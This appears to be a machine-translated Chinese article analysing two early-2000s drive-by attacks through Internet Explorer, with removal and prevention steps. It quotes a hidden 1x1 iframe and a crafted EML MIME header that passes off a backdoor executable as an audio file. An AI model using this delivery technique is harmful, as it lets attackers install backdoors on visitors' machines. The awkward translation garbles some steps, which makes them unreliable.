Malicious code and Network security _ security-related

Browsing the web can infect "virus", browsing the webpage can infect Trojan, do you believe? About half a year ago someone used this technique to attack! Malicious code has a relatively large concealment, so far, there is no virus firewall can well prevent malicious code attacks, most of them can not even find.
"Computer newspaper" this year, 25 D4 edition has introduced a website called gohip, you can modify the browser's default URL to point to the Gohip site. In fact, this is polite, if you go to browse a site called "Million Flower Valley", you will feel that Gohip is "merciful".

First, personal experience

In the case of open a variety of virus firewall to enter the site without the alarm, can quickly slow the mouse, when leaving the site, suddenly opened countless new ie windows, immediately with "ALT+F4" to turn off all windows, can be followed by the Win 98 error, press any key no response, press move "ctrl+alt+ Del "Close the unresponsive program, but immediately appear blue screen, panic." Reboot the machine, and appear: "Welcome you to the million-flowered valley, you have the ' million flower virus ' please contact with qq:4040465, press the" OK "button, you can enter win 98, but the desktop has been empty, click the" Start "menu, found that" shutdown "," run "both disappeared, Restarting the machine again is still the case.

Second, the solution

If you are not careful to recruit, you can use the following three ways to solve:

Method One:

1. A disk boot, in the DOS environment to find the C: directory (Note: Sysbckup directory is a hidden attribute, you should first use the ATTRIB command to remove its hidden attributes), Can find rb000.cab~rb004.cab these five files, this is the most recent five registry backup files, select Rb004.cab copy out.

2. On the other machine with zip decompression Rb004.cab get four files, copy the four files to C: Under the original file.

3. Start the computer in Safe mode, run the Msconfig, find the Ha.hta in the "Boot" tab, and remove the "√" in front of the multiple selection box.

4. Reboot the machine everything OK.

Method Two: In DOS with the Scanreg/restore registry, and then delete the boot group in the Ha.hta can be.

Method III: Use the "Super Bunny" System software or "Windows Optimization Master" recovery.

"Super Bunny" You can restore permission settings for Windows systems. Open the IE icon on the shortcut bar (because the system locks up Explorer, you can also run the Find feature).

In the IE Address bar input needs to enter the target disk, such as "e:u8221, find the Super Rabbit, open the" Ms98.exe. First, in the tool options, click "Advanced Hide", remove the "C:" Hook in the hidden disk bar, and then click "Desktop and Icon" and add a hook before the "Show icon on desktop" option. After you save it, click "Security and Multiuser" to remove the text from the "title to display on startup" and "information to display when you start" column. In the tool option click "IE 4/5", "in the IE title" column to remove the text, save ok!

Specifically, when you open the page, it automatically changes the browser's default page, so change back to Windows settings must modify the browser's default page, or the next time the Internet will go into the million flower page.

Third, prevention measures:

1. Don't go to sites that you don't understand.

2. Disables all ActiveX Plug-ins and controls, Java scripts, and so on in IE settings. The method is: Click the "Tools →internet option" in the IE window, select "Security" tab in the pop-up dialog box, and click on the "Custom Level" button, the "Security Settings" dialog box will pop up, and all ActiveX Plug-ins and controls as well as Java related all are selected "disabled". Under Win 2000, the Remote Registry operation service inside the service, "Remote Registry services" are disabled. Click "admin tools → services →remote Registry service (Allow remote Registry operations)" To disable this entry.

3. Since the "Million Flower Valley" is to modify the registry to destroy our system, then we can lock the registry, prohibit the modification of the registry, so that can achieve the purpose of prevention.

The lock method is as follows:

£ (1) Run Registry Editor Regedit.exe;

(2) to "HKEY_CURRENT_USER", create a new DWORD named "DisableRegistryTools" and change its value to "1" to prevent the use of Registry Editor Regedit.exe.

The Unlock method is as follows:

Use Notepad to edit a. reg file of any name, such as Unlock.reg, as follows:

regedit4

[hkey_current_user] "DisableRegistryTools" =dword:00000000

Save to exit. If you want to use Registry Editor, double-click Unlock.reg. Note that, after "REGEDIT4" must be empty line, and "REGEDIT4" in the "4" and "T" between must not have spaces, otherwise will be naught!

4. For all users, you can prevent this kind of malicious Web page by upgrading to the latest KVW3000 virus library and opening the KVW3000 virus firewall on the Internet (note: You must be a virus library after June 28).

Editor's note: Last period we introduced is "Million Flower Valley" virus attack and defense war, in fact, there are many similar sites on the Internet, as long as there is a new virus with the site appears, we have the obligation to inform you. If you have Internet security contributions, please send XIONGJIE@CPCW. COM mail box, we will be the fastest speed of practical articles published.

First, personal experience

In the process of entering the Trojan page, the mouse strangely into the hourglass shape, it seems that there is indeed a program running. Open the computer's task Manager, you can see one more wincfg. EXE's process. The corresponding file for the process is c\winnt\wincfg under Win2000. EXE, under the Win98 is c\windows\wincfg. Exe.

Run Registry Editor regedit, find wincfg under "Hkey_local_machine\software\microsoft\windows\currentverion\run". EXE, it will register itself in the registry boot key, so that each boot will automatically run wincfg. Exe. (as pictured)

Note: The person who sets you up can set this Trojan's startup key name and registration file name, the name of the registration file name is the runtime process, so the results may be different.

Run Jinshan Poison PA, report found "backdoor Bnlite", Oh, the original Trojan horse Bnlite server renamed to Wincfg. Exe. Although this Trojan server program is not large (only 6. 5K), but its function can be many: with the ICQ notification function, remote removal service side function, set port and run name, upload download ... If you have the Trojan, then the Trojan control can be completely through this trojan in your computer to build a hidden FTP server, others have the maximum access to your computer! It will be very easy to control your computer in this way!

How to download the Trojan horse to browse the home page of the computer, and run it up? Click "Tools" → "internet Options" → "Security" → "Custom security level" in IE, disable all ActiveX related options, and then browse the Web page for wincfg. EXE is still downloaded and run! It seems to have nothing to do with ActiveX. The option to download the file in the custom security level is prohibited, and then browse to the Web page, this time wincfg. EXE is no longer downloaded.

Second, the problem reveals

Let's take a look at wincfg. EXE is how to download to the browser's computer, click on the right mouse button, select the "View Source code", in the end of the page code found suspicious statements:

<iframe src=wincfg. EML width=1 height=1>

Attention to the "wincfg." EML "? We all know eml for mail format, Web page to eml file what? Very suspicious! In IE browser input: HTTP//SHIRF. 51. Net/wincfg. EML, then look at the task Manager, Wincfg. EXE process is back, the original problem on this file! Since the problem is on this document, of course we have to find a way to get the document. With the ant to download the file, the mouse just point up, wincfg. EXE has been executed again, really haunting ah!

Open Wincfg. EML, the key elements found are as follows:

content-typeaudio/x-wavname= "Wincfg. EXE "★ This sentence defines the file name, this is wincfg. Exe

content-transfer-encodingbase64★ defines the code format as base64

content-id <THE-CID> ★ Starting from here is the beginning of the code

tvqqaamaaaaeaaaa//8aal ...  the following to delete a large ★ these are wincfg. EXE after Base64 encoded content

The above added "★" part for the annotation content. This base64-encoded file will be compiled into wincfg when you browse the Web. EXE file and run, which is the reason for browsing the Web page will be in the Trojan! At this point I understand that, in fact, the so-called browsing Web page will be in the Trojan, but the Web page maker used the Microsoft IE browser in the vulnerability to attack a case only, in plain words is the use of the wrong mimemultipurpose Internet Mail extentions, Multi-purpose Internet Mail Extension protocol  header for attack.

Third, the truth

Now, look back to see what I have in the Trojan is going on. Actually, wincfg. EXE this file here is equivalent to the attachment of the message, as we can see from the code listed, the attacker put the wincfg. EXE type is defined as audio/x-wav, because the type of the message is audio/x-wav, IE has the wrong MIME head vulnerability will be considered as an audio file, and automatically try to open, resulting in the message file wincfg. The attachment wincfg in the EML. EXE (trojan) is executed. Under Win2000, even with the mouse click Download down the wincfg. EML, or copying and pasting the file, can cause wincfg. EML in the attachment is run, Microsoft's this loophole is really hairenbujian ah. Now it seems that the original attackers tried to deceive the target to execute the modified Trojans and other backdoor procedures, is how backward means Ah! Now, how simple and easy it is to use the big flaw of Microsoft's "creation" to attack. The only condition is that the target is being attacked using IE5. One of the 0 and above, how many users use IE browser? Look at the friends around you and know the answer!

Iv. Solutions

1 click "Start" → "Run", enter "regedit" in the pop-up dialog box, carriage return. then expand the registry to "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" under Delete wincfg. Exe

2 to your computer's system directory, delete the wincfg. EXE file;

3 reboot the machine, it's all OK!

V. Methods of prevention

1. Users of IE and Outlook.

1 in IE's "tools →internet option → security →internet area security Level", the security pole from "medium" changed to "high".

2 Click the "Custom Level" button and, in the pop-up window, disable the "Execute script for ActiveX controls marked as safe for scripting", "Active Scripting" and "File Download" features.

3 disables all ActiveX controls and Plug-ins.

4 set the resource Manager to always show extensions.

5 prevents the use of resource managers in the Web.

6 Cancel the "Confirm open after Download" Extension property setting.

2. Don't be tempted by a stranger. Open the URL that someone gave you, if you really want to see, you can download the page through some download tools, and then use Notepad and other text editing tools to open the viewing code.

3. Microsoft has provided a patch for the flaw, so go to the URL listed below to see it!